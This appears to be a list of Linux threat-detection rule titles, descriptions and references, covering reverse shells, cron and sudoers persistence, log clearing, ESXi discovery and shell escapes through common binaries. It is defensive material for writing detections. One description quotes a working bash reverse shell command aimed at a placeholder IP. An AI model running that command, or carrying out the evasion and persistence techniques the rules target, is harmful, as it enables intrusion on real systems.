Suspicious OpenSSH Daemon Error Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c, https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml
Sudo Privilege Escalation CVE-2019-14287 - Builtin Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546
Disabling Security Tools - Builtin Detects disabling security tools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
Persistence Via Sudoers Files Detects creation of a sudoers file or files in the "sudoers.d" directory, which can be used as a potential method to persist privileges for a specific user. https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
Suspicious Named Error Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml
Suspicious VSFTPD Error Messages Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts https://github.com/dagwieers/vsftpd/
Potentially Suspicious Shell Script Creation in Profile Folder Detects the creation of shell scripts under the "profile.d" path. https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Triple Cross eBPF Rootkit Default LockFile Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33
Persistence Via Cron Files Detects creation of a cron file or files in cron directories, which could indicate potential persistence. https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml
Linux Reverse Shell Indicator Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Wget Creating Files in Tmp Directory Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Triple Cross eBPF Rootkit Default Persistence Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are related to the TripleCross persistence method https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh
Linux Doas Conf File Creation Detects the creation of doas.conf file in linux host platform. https://research.splunk.com/endpoint/linux_doas_conf_file_creation/, https://www.makeuseof.com/how-to-install-and-use-doas/
Communication To Ngrok Tunneling Service - Linux Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data by malicious actors https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
Communication To LocaltoNet Tunneling Service Initiated - Linux Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications
Linux Crypto Mining Pool Connections Detects process connections to a Monero crypto mining pool https://www.poolwatch.io/coin/monero
Potentially Suspicious Malware Callback Communication - Linux Detects programs that connect to known malware callback ports based on threat intelligence reports. https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections, https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team, https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html, https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html, https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors
Shell Invocation via Apt - Linux Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/apt/, https://gtfobins.github.io/gtfobins/apt-get/
Scheduled Task/Job At Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md
Suspicious Invocation of Shell via AWK - Linux Detects the execution of "awk" or its sibling commands to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. https://gtfobins.github.io/gtfobins/awk/#shell, https://gtfobins.github.io/gtfobins/gawk/#shell, https://gtfobins.github.io/gtfobins/nawk/#shell, https://gtfobins.github.io/gtfobins/mawk/#shell
Decode Base64 Encoded Text Detects usage of base64 utility to decode arbitrary base64-encoded text https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
Linux Base64 Encoded Pipe to Shell Detects suspicious process command line that uses base64 encoded input for execution with a shell https://github.com/arget13/DDexec, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Bash Interactive Shell Detects execution of the bash shell with the interactive flag "-i". https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://linux.die.net/man/1/bash
BPFtrace Unsafe Option Usage Detects the usage of the unsafe bpftrace option https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/
Enable BPF Kprobes Tracing Detects common command used to enable bpf kprobes tracing https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/, https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html
Capabilities Discovery - Linux Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes, https://github.com/carlospolop/PEASS-ng, https://github.com/diego-treitos/linux-smart-enumeration
Capsh Shell Invocation - Linux Detects the use of the "capsh" utility to invoke a shell. https://gtfobins.github.io/gtfobins/capsh/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Remove Immutable File Attribute Detects usage of the 'chattr' utility to remove immutable file attribute. https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Linux Base64 Encoded Shebang In CLI Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html, https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Clipboard Collection with Xclip Tool Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. https://www.packetlabs.net/posts/clipboard-data-security/
Clear Linux Logs Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
Cat Sudoers Detects the execution of a cat /etc/sudoers to list all users that have sudo rights https://github.com/sleventyeleven/linuxprivchecker/
Commands to Clear or Remove the Syslog Detects specific commands commonly used to remove or empty the syslog, which is often used by attackers as a method to hide their tracks https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
Crontab Enumeration Detects usage of crontab to list the tasks of the user https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Copy Passwd Or Shadow From TMP Path Detects when the file "passwd" or "shadow" is copied from tmp path https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Remove Scheduled Cron Task/Job Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Linux Crypto Mining Indicators Detects command line parameters or strings often used by crypto miners https://www.poolwatch.io/coin/monero
Curl Usage on Linux Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Atlassian Confluence CVE-2022-26134 Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Apache Spark Shell Command Injection - ProcessCreation Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files
DD File Overwrite Detects potential overwriting and deletion of a file using DD. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd
Potential Linux Process Code Injection Via DD Utility Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/, https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh
Ufw Force Stop Using Ufw-Init Detects attempts to force stop the ufw using ufw-init https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Linux Doas Tool Execution Detects the doas tool execution on a Linux host platform. This utility allows standard users to perform tasks as root, the same way sudo does. https://research.splunk.com/endpoint/linux_doas_tool_execution/, https://www.makeuseof.com/how-to-install-and-use-doas/
Shell Invocation via Env Command - Linux Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. https://gtfobins.github.io/gtfobins/env/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
ESXi Network Configuration Discovery Via ESXCLI Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html
ESXi Admin Permission Assigned To Account Via ESXCLI Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi Storage Information Discovery Via ESXCLI Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html
ESXi Syslog Configuration Change Via ESXCLI Detects changes to the ESXi syslog configuration via "esxcli" https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi System Information Discovery Via ESXCLI Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi Account Creation Via ESXCLI Detects user account creation on ESXi system via esxcli https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
ESXi VM List Discovery Via ESXCLI Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
ESXi VM Kill Via ESXCLI Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
ESXi VSAN Information Discovery Via ESXCLI Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html
File and Directory Discovery - Linux Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
File Deletion Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
Shell Execution via Find - Linux Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. https://gtfobins.github.io/gtfobins/find/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Shell Execution via Flock - Linux Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/flock/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Shell Execution GCC - Linux Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/gcc/#shell, https://gtfobins.github.io/gtfobins/c89/#shell, https://gtfobins.github.io/gtfobins/c99/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Shell Execution via Git - Linux Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/git/#shell
OS Architecture Discovery Via Grep Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Group Has Been Deleted Via Groupdel Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/groupdel
Install Root Certificate Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
Suspicious Package Installed - Linux Detects installation of suspicious packages using system installation utilities https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
Flush Iptables Ufw Chain Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic https://blogs.blackberry.com/, https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Local System Accounts Discovery - Linux Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md, https://my.f5.com/manage/s/article/K589, https://man.freebsd.org/cgi/man.cgi?pwd_mkdb
Local Groups Discovery - Linux Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
Potential GobRAT File Discovery Via Grep Detects the use of grep to discover specific files created by the GobRAT malware https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Named Pipe Created Via Mkfifo Detects the creation of a new named pipe using the "mkfifo" utility https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Potentially Suspicious Named Pipe Created Via Mkfifo Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Mount Execution With Hidepid Parameter Detects execution of the "mount" command with the "hidepid" parameter to make processes invisible to other users of the system https://blogs.blackberry.com/, https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
Potential Netcat Reverse Shell Execution Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/, https://www.infosecademy.com/netcat-reverse-shells/, https://man7.org/linux/man-pages/man1/ncat.1.html
Shell Execution via Nice - Linux Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/nice/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Nohup Execution Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments https://gtfobins.github.io/gtfobins/nohup/, https://en.wikipedia.org/wiki/Nohup, https://www.computerhope.com/unix/unohup.htm
Suspicious Nohup Execution Detects execution of binaries located in potentially suspicious locations via "nohup" https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
OMIGOD SCX RunAsProvider ExecuteScript Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059
OMIGOD SCX RunAsProvider ExecuteShellCommand Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059
Potential Perl Reverse Shell Execution Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Potential PHP Reverse Shell Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Pnscan Binary Data Transmission Activity Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence, https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf, https://regex101.com/r/RugQYK/1, https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content
Connection Proxy Detects setting proxy configuration https://attack.mitre.org/techniques/T1090/
Python Spawning Pretty TTY Via PTY Module Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Python Reverse Shell Execution Via PTY And Socket Modules Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell. https://www.revshells.com/
Inline Python Execution - Spawn Shell Via OS System Library Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" library and spawn a shell. https://gtfobins.github.io/gtfobins/python/#shell
Remote Access Tool - Team Viewer Session Started On Linux Host Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. Internal Research
Linux Remote System Discovery Detects the enumeration of other remote systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Linux Package Uninstall Detects Linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". https://sysdig.com/blog/mitre-defense-evasion-falco, https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command, https://linuxhint.com/uninstall_yum_package/, https://linuxhint.com/uninstall-debian-packages/
Shell Execution via Rsync - Linux Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/rsync/#shell
Suspicious Invocation of Shell via Rsync Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation. https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/, https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10
Potential Ruby Reverse Shell Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to set up a reverse shell https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Scheduled Cron Task/Job - Linux Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
Security Software Discovery - Linux Detects usage of system utilities (only grep and egrep for now) to discover security software https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
Disabling Security Tools Detects disabling security tools https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
Disable Or Stop Services Detects the usage of utilities such as 'systemctl', 'service', etc. to stop or disable tools and services https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
Setuid and Setgid Detects suspicious change of file privileges with chown and chmod commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md, https://attack.mitre.org/techniques/T1548/001/
Shell Invocation Via Ssh - Linux Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. https://gtfobins.github.io/gtfobins/ssh/, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
Potential Linux Amazon SSM Agent Hijacking Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
Sudo Privilege Escalation CVE-2019-14287 Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546
Chmod Suspicious Directory Detects chmod targeting files in abnormal directory paths. https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
Container Residence Discovery Via Proc Virtual FS Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
Suspicious Curl File Upload - Linux Detects a suspicious curl process start that adds a file to a web request https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html, https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
Suspicious Curl Change User Agents - Linux Detects a suspicious curl process start on Linux that sets the user agent option https://curl.se/docs/manpage.html
Docker Container Discovery Via Dockerenv Listing Detects listing or file reading of ".dockerenv" which can be a sign of potential container discovery https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
Potentially Suspicious Execution From Tmp Folder Detects a potentially suspicious execution of a process located in the '/tmp/' folder https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
Potential Discovery Activity Using Find - Linux Detects usage of "find" binary in a suspicious manner to perform discovery https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
Suspicious Git Clone - Linux Detects execution of "git" in order to clone a remote repository whose name contains suspicious keywords https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
